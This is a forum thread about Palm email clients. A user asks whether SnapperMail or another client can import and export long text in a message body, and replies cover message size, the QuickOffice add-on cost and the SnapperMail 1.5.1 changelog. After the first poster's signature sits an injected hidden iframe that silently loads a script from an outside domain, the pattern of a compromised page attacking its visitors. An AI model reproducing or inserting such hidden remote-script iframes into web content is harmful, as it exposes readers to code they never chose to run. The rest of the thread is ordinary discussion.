+ Reply to Thread

Snappermail (or other) - can import export text into message body

Does Snappermail or any other client allow me to

1. Receive a message with a lot of text (say >4k, i.e. bigger than Palm OS limit) and export it to Memo or better yet Doc without requiring multiple cut/paste?

2. Import into the body of a message a similar quantity of text or DOC text?

I can't do what I need to do with attachments.

Eudora and Mobile Mail can't do what I'm asking. Can anything?

Bart<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I don't know if this answers any of your questions, but Snappermail has literally UNLIMITED message size. You could paste an entire novel (or more) into an email and it would send or receive it just fine.
    ~'kito
    pdaPhoneHome Moderator

Markito, thanks. What I want is a way to receive a bunch of text in an email *body*, edit it and send it back. Or, to write a couple thousand words from scratch, then send them in a message body by email.

I'd like to use QED or MiniWrite to write and edit if possible. I can't use attachments to make this work with my office system.

I suppose I could just write and edit in the email prog itself, but I'm looking for a way to get text in and out. I'm amazed no one seems to have a "save as" or "export" or "save to" command for message texts, and likewise no "paste from" or "import text" or some such.

Speaking of: Is it me or did everyone else wonder when they received Snapper Email's "Official release" today what happen to the conduits to open attachments (ie. MS Word, Excel, etc). I see they are now offering a "Beta Copy" of an interface they have negotiated with QuickOffice. Which, while Im sure it will work will end up being an additional $49.95 if you want it. Heck I thought Snapper had always promoted that these "conduits" to open these attachments were coming in "upcoming releases" I guess I missed the fine print that said it was goingto be extra.

What are the enhancements to 1.5.1?

Originally posted by HoTSynC
    What are the enhancements to 1.5.1?
    - NEW: When a "New Mail" alert comes up, Treo jog-down will open the new mail
    - NEW: SnapperMail Provisioning API for Site licenses
    - NEW: Automatically discards trash of old messages, user configurable
    - NEW: Telephony API support, checks phone is on/available before periodic fetch (Treo, Kyocera 7135, OS4/5)
    - NEW: Internal message creation API, allows other apps to create SnapperMail messages
    - Quickoffice 7 Premier beta trial now included in distribution (Word, Excel, PowerPoint support)
    - Now does not attempt auto SMTP AUTH when SMTP settings are set not to authorize
    - Timezone offset now displays DST in the timezone prefs on OS 3.5 devices
    - Site License versions of SnapperMail is now a separate build
    - Connecting to server timeout increased from 15sec to 30sec
    - Added progress bar when discarding from trash
    - Fixed. SnapperMail can crash some rather badly written SMTP servers during SMTP AUTH
    - Fixed. New message alarm did not sound on non-Treo OS 3.5 devices
    - Fixed. Unreliable comms when IP numbers are configured for SMTP and POP server addresses
    - Fixed. Treo Jog Up jumps to immediately headers instead of scrolling.
    - Fixed. Umlaut chars in HotSync ID caused invalid unlock codes
    - Fixed. SnapperMail locks up when Apple sends invalid MIME messages
    - Fixed. Attachments opened in built-in PIM apps get filed into an invisible category

I guess I really should buy it....

For a Palm app, that is steap!

Originally posted by HoTSynC
    I guess I really should buy it....

For a Palm app, that is steap!
    :topic-off Now, you have 1000 posts....

Alan